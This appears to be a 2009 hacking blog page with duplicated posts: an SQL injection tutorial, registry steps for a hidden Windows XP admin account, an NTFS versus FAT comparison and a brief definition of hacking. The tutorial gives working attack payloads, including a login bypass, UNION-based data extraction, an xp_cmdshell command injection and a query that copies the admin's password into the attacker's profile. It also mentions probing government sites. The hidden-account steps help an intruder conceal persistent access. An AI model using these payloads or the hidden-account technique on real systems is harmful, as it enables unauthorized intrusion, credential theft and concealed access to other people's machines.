Now if the site is not vulnerable, it filters and the page loads normally.
But, if it doesn't filter the query string, it would give the error something like below:
"MySQL Syntax Error By '5 '' In Article.php on line 15."
or
error that says us to check the correct MySQL version or MySQL Fetch error or sometimes just blank page. The error may be in any form. So it makes us sure that the site is vulnerable.
Also just using ' may not be the sure test; so you may try different things like:
www.site.com/article.php?id=5 union select 1--
If you get error with this, you again come to know that its vulnerable... Just try different things..
Read part 2 to continue...
What is SQL Injection ?
SQL injection is the most common and videly used exploit by hackers all over the world...few days back i was just doing some SQL injection test on Indian govt sites, I was shocked to see how many imp govt sites r open to it....this is a big thread for us...a malicious hacker can do a lot of harm if he wish to.
Vocabulary:
* SQL: Server Query Language- used in web applications to interact with databases.
* SQL Injection : Method of exploiting a web application by supplying user input designed to manipulate SQL database queries.
* "Injection": You enter the injections into an html form which is sent to the web application. The application then puts you input directly into a SQL query. In advertantly, this allows you to manipulate to query...
Prerequisite:
* A background of programming and a general idea of how most hacking methods are done.
Application:
* Hacking a SQL database- driven server (usually only the ones that use unparsed user input in database queries). There is still a surprising number of data-driven web applications on the net that are vulnerable to this type of exploit. Being as typical as all method, the frequency of possible targets decreases over time as the method becomes more known. This is one those exploits that aren't easily prevented by a simple patch but by a competent programmer.
Use:
First, let's look at a typical SQL query:
SELECT fieldName1 , fieldName2 FROM databaseName WHERE restrictionsToFilterWhichEntri esToReturn
Now, to dissect...
The red areas is where criterion is inputed. The rest of the query structures the query.
* SELECT fieldName1 , fieldName2 - Specifies the of the names of fields that will be returned from the database.
* FROM databaseName - Specifies the name of the database to search.
* WHERE restrictionsToFilterWhichEntri esToReturn - Specifies which entries to return.
Here is an example for somebody's login script:
SELECT userAcessFlags FROM userDatabase WHERE userName="(input here)" AND userPass="(input here)"
The idea is guess what that application's query looks like and input things designed to return data other than what was intended.
In the example, input like the following could give gain access to the administrator account:
User: administrator
Pass: " OR ""="
Making the query like this:
SELECT userAcessFlags FROM userDatabase WHERE userName="administrator" AND userPass="" OR ""=""
As you can see, ""="" (nothing does indeed match nothing)
Note: Injections are rarely as simple as this...
One can be creative and use error messages to your advantadge to access other databases, fields, and entries. Learn a little SQL to use things like UNION to merges query results with ones not intended.On the security side, parse user data and get rid of any extra symbols now that you know how it's done.
The idea in this example is to break out of the quotation marks.
When stuff is inside quotation marks, the stuff isn't processed as code or anything but as a phrase and what it is.
The password injection was: " OR ""="
What this does is close the string that was started by the quotation mark in the part userPass=". Once you break out, THEN stuff is considered code. So, I put OR ""=" after I break out of the string. You will notice that it is comparing two quotation marks with one, but the quotation mark already built in by the application finishes it so we have this:
userPass="" OR ""=""
Notice how the first and last quotation marks are not colored and are not built in.
Additional notes:
This was just an extremely simplified version and you will probably need to learn a little SQL to fully understand.
Here are a few SQL terms that do other things:
UNION: You use this to merge the results of one query with another. You may put things like SELECT after UNION in order to search other databases and stuff. Sometimes you may need to use ALL in conjuction to break out of certain clauses. It does no harm so when in doubt you could do something like:
" UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE userName="admin
The key when using UNION is to make your new query return the same amount of columns in the same datatype so that you may get the results you want.
:-- This works sometimes to terminate the query so that it ignores to the rest of the stuff that might be fed afterwards if you don't like it. For example:
SELECT * FROM userDatabase WHERE userName="admin";--" AND userPass="aH0 qcQOVz7 e0s"
NOT IN: If you have no idea which record you want you could record cycle (you request vague info, and you put what you already got in the NOT IN clause so that you can get the next entry)
Usage:
SELECT userName userPass FROM userDatabase WHERE userName NOT IN ('Dehstil','Twistedchaos')
EXEC: This command should never work, but if it does...you win; you could do anything. For instance, you could inject something like this:
';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:
All my examples so far have dealt with read processes. To manipulate a write process, here is an example for those who know what their doing:
INSERT INTO userProfile VALUES(''+ (SELECT userPass FROM userDatabase WHERE userName='admin')+ '' + 'Chicago' + 'male')
This example would theoretically put the admin's password in your profile.
Vocabulary:
* SQL: Server Query Language- used in web applications to interact with databases.
* SQL Injection : Method of exploiting a web application by supplying user input designed to manipulate SQL database queries.
* "Injection": You enter the injections into an html form which is sent to the web application. The application then puts you input directly into a SQL query. In advertantly, this allows you to manipulate to query...
Prerequisite:
* A background of programming and a general idea of how most hacking methods are done.
Application:
* Hacking a SQL database- driven server (usually only the ones that use unparsed user input in database queries). There is still a surprising number of data-driven web applications on the net that are vulnerable to this type of exploit. Being as typical as all method, the frequency of possible targets decreases over time as the method becomes more known. This is one those exploits that aren't easily prevented by a simple patch but by a competent programmer.
Use:
First, let's look at a typical SQL query:
SELECT fieldName1 , fieldName2 FROM databaseName WHERE restrictionsToFilterWhichEntri esToReturn
Now, to dissect...
The red areas is where criterion is inputed. The rest of the query structures the query.
* SELECT fieldName1 , fieldName2 - Specifies the of the names of fields that will be returned from the database.
* FROM databaseName - Specifies the name of the database to search.
* WHERE restrictionsToFilterWhichEntri esToReturn - Specifies which entries to return.
Here is an example for somebody's login script:
SELECT userAcessFlags FROM userDatabase WHERE userName="(input here)" AND userPass="(input here)"
The idea is guess what that application's query looks like and input things designed to return data other than what was intended.
In the example, input like the following could give gain access to the administrator account:
User: administrator
Pass: " OR ""="
Making the query like this:
SELECT userAcessFlags FROM userDatabase WHERE userName="administrator" AND userPass="" OR ""=""
As you can see, ""="" (nothing does indeed match nothing)
Note: Injections are rarely as simple as this...
One can be creative and use error messages to your advantadge to access other databases, fields, and entries. Learn a little SQL to use things like UNION to merges query results with ones not intended.On the security side, parse user data and get rid of any extra symbols now that you know how it's done.
The idea in this example is to break out of the quotation marks.
When stuff is inside quotation marks, the stuff isn't processed as code or anything but as a phrase and what it is.
The password injection was: " OR ""="
What this does is close the string that was started by the quotation mark in the part userPass=". Once you break out, THEN stuff is considered code. So, I put OR ""=" after I break out of the string. You will notice that it is comparing two quotation marks with one, but the quotation mark already built in by the application finishes it so we have this:
userPass="" OR ""=""
Notice how the first and last quotation marks are not colored and are not built in.
Additional notes:
This was just an extremely simplified version and you will probably need to learn a little SQL to fully understand.
Here are a few SQL terms that do other things:
UNION: You use this to merge the results of one query with another. You may put things like SELECT after UNION in order to search other databases and stuff. Sometimes you may need to use ALL in conjuction to break out of certain clauses. It does no harm so when in doubt you could do something like:
" UNION ALL SELECT 0,'','hash' FROM otherDatabase WHERE userName="admin
The key when using UNION is to make your new query return the same amount of columns in the same datatype so that you may get the results you want.
:-- This works sometimes to terminate the query so that it ignores to the rest of the stuff that might be fed afterwards if you don't like it. For example:
SELECT * FROM userDatabase WHERE userName="admin";--" AND userPass="aH0 qcQOVz7 e0s"
NOT IN: If you have no idea which record you want you could record cycle (you request vague info, and you put what you already got in the NOT IN clause so that you can get the next entry)
Usage:
SELECT userName userPass FROM userDatabase WHERE userName NOT IN ('Dehstil','Twistedchaos')
EXEC: This command should never work, but if it does...you win; you could do anything. For instance, you could inject something like this:
';EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:
All my examples so far have dealt with read processes. To manipulate a write process, here is an example for those who know what their doing:
INSERT INTO userProfile VALUES(''+ (SELECT userPass FROM userDatabase WHERE userName='admin')+ '' + 'Chicago' + 'male')
This example would theoretically put the admin's password in your profile.
Create Hidden Admin Account in XP
Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further. After you have Backed up your registry follow the Steps to Create your Hidden Account:
First Goto Start -> Run -> Type regedit -> Enter
In the Left Menu goto,
HKEY_LOCAL_MACHINE\Softwa re\Microsoft\WindowsNT\Curre ntVersion\Winlogon\SpecialAcc ounts\UserList
In the Right pane, Right click -> New -> String Value
Right click on the new String Value and click Rename
Type the Name of the Account you want to hide.
Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
Now Save and Exit the Registry and Logoff.
Goto welcome screen and Hit ctrl+ alt+del twice to bring up Logon prompt
Type hidden Accounts name and password
Enjoy!!!
First Goto Start -> Run -> Type regedit -> Enter
In the Left Menu goto,
HKEY_LOCAL_MACHINE\Softwa re\Microsoft\WindowsNT\Curre ntVersion\Winlogon\SpecialAcc ounts\UserList
In the Right pane, Right click -> New -> String Value
Right click on the new String Value and click Rename
Type the Name of the Account you want to hide.
Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
Now Save and Exit the Registry and Logoff.
Goto welcome screen and Hit ctrl+ alt+del twice to bring up Logon prompt
Type hidden Accounts name and password
Enjoy!!!
Thursday, July 23, 2009
NTFS vs FAT
To NTFS or not to NTFS-that is the question. But unlike the deeper questions of life, this one isn't really all that hard to answer. For most users running Windows XP, NTFS is the obvious choice. It's more powerful and offers security advantages not found in the other file systems. But let's go over the differences among the files systems so we're all clear about the choice. There are essentially three different file systems available in Windows XP: FAT16 , short for File Allocation Table, FAT32, and NTFS, short for NT File System.
FAT16
The FAT16 file system was introduced way back with MS- DOS in 1981 , and it's showing its age. It was designed originally to handle files on a floppy drive, and has had minor modifications over the years so it can handle hard disks, and even file names longer than the original limitation of 8.3 characters, but it's still the lowest common denominator. The biggest advantage of FAT16 is that it is compatible across a wide variety of operating systems, including Windows 95 /98 /Me, OS/2 , Linux, and some versions of UNIX.
The biggest problem of FAT16 is that it has a fixed maximum number of clusters per partition, so as hard disks get bigger and bigger, the size of each cluster has to get larger. In a 2 -GB partition, each cluster is 32 kilobytes, meaning that even the smallest file on the partition will take up 32 KB of space. FAT16 also doesn't support compression, encryption, or advanced security using access control lists. FAT32
The FAT32 file system, originally introduced in Windows 95 Service Pack 2 , is really just an extension of the original FAT16 file system that provides for a much larger number of clusters per partition. As such, it greatly improves the overall disk utilization when compared to a FAT16 file system. However, FAT32 shares all of the other limitations of FAT16 , and adds an important additional limitation-many operating systems that can recognize FAT16 will not work with FAT32 - most notably Windows NT, but also Linux and UNIX as well. Now this isn't a problem if you're running FAT32 on a Windows XP computer and sharing your drive out to other computers on your network-they don't need to know (and generally don't really care) what your underlying file system is. The Advantages of NTFS
The NTFS file system, introduced with first version of Windows NT, is a completely different file system from FAT. It provides for greatly increased security, file- by-file compression, quotas, and even encryption. It is the default file system for new installations of Windows XP, and if you're doing an upgrade from a previous version of Windows, you'll be asked if you want to convert your existing file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32 volumes to NTFS at any point. Just remember that you can't easily go back to FAT or FAT32 (without reformatting the drive or partition), not that I think you'll want to. The NTFS file system is generally not compatible with other operating systems installed on the same computer, nor is it available when you've booted a computer from a floppy disk. For this reason, many system administrators, myself included, used to recommend that users format at least a small partition at the beginning of their main hard disk as FAT. This partition provided a place to store emergency recovery tools or special drivers needed for reinstallation, and was a mechanism for digging yourself out of the hole you'd just dug into. But with the enhanced recovery abilities built into Windows XP (more on that in a future column), I don't think it's necessary or desirable to create that initial FAT partition. When to Use FAT or FAT32
If you're running more than one operating system on a single computer, you will definitely need to format some of your volumes as FAT. Any programs or data that need to be accessed by more than one operating system on that computer should be stored on a FAT16 or possibly FAT32 volume. But keep in mind that you have no security for data on a FAT16 or FAT32 volume-any one with access to the computer can read, change, or even delete any file that is stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a network. So do not store sensitive files on drives or partitions formatted with FAT file systems.
FAT16
The FAT16 file system was introduced way back with MS- DOS in 1981 , and it's showing its age. It was designed originally to handle files on a floppy drive, and has had minor modifications over the years so it can handle hard disks, and even file names longer than the original limitation of 8.3 characters, but it's still the lowest common denominator. The biggest advantage of FAT16 is that it is compatible across a wide variety of operating systems, including Windows 95 /98 /Me, OS/2 , Linux, and some versions of UNIX.
The biggest problem of FAT16 is that it has a fixed maximum number of clusters per partition, so as hard disks get bigger and bigger, the size of each cluster has to get larger. In a 2 -GB partition, each cluster is 32 kilobytes, meaning that even the smallest file on the partition will take up 32 KB of space. FAT16 also doesn't support compression, encryption, or advanced security using access control lists. FAT32
The FAT32 file system, originally introduced in Windows 95 Service Pack 2 , is really just an extension of the original FAT16 file system that provides for a much larger number of clusters per partition. As such, it greatly improves the overall disk utilization when compared to a FAT16 file system. However, FAT32 shares all of the other limitations of FAT16 , and adds an important additional limitation-many operating systems that can recognize FAT16 will not work with FAT32 - most notably Windows NT, but also Linux and UNIX as well. Now this isn't a problem if you're running FAT32 on a Windows XP computer and sharing your drive out to other computers on your network-they don't need to know (and generally don't really care) what your underlying file system is. The Advantages of NTFS
The NTFS file system, introduced with first version of Windows NT, is a completely different file system from FAT. It provides for greatly increased security, file- by-file compression, quotas, and even encryption. It is the default file system for new installations of Windows XP, and if you're doing an upgrade from a previous version of Windows, you'll be asked if you want to convert your existing file systems to NTFS. Don't worry. If you've already upgraded to Windows XP and didn't do the conversion then, it's not a problem. You can convert FAT16 or FAT32 volumes to NTFS at any point. Just remember that you can't easily go back to FAT or FAT32 (without reformatting the drive or partition), not that I think you'll want to. The NTFS file system is generally not compatible with other operating systems installed on the same computer, nor is it available when you've booted a computer from a floppy disk. For this reason, many system administrators, myself included, used to recommend that users format at least a small partition at the beginning of their main hard disk as FAT. This partition provided a place to store emergency recovery tools or special drivers needed for reinstallation, and was a mechanism for digging yourself out of the hole you'd just dug into. But with the enhanced recovery abilities built into Windows XP (more on that in a future column), I don't think it's necessary or desirable to create that initial FAT partition. When to Use FAT or FAT32
If you're running more than one operating system on a single computer, you will definitely need to format some of your volumes as FAT. Any programs or data that need to be accessed by more than one operating system on that computer should be stored on a FAT16 or possibly FAT32 volume. But keep in mind that you have no security for data on a FAT16 or FAT32 volume-any one with access to the computer can read, change, or even delete any file that is stored on a FAT16 or FAT32 partition. In many cases, this is even possible over a network. So do not store sensitive files on drives or partitions formatted with FAT file systems.
Wednesday, July 22, 2009
WHAT IS A HACK
What is hacking?
Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.
Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.
Subscribe to:
Posts (Atom)
MY STATS
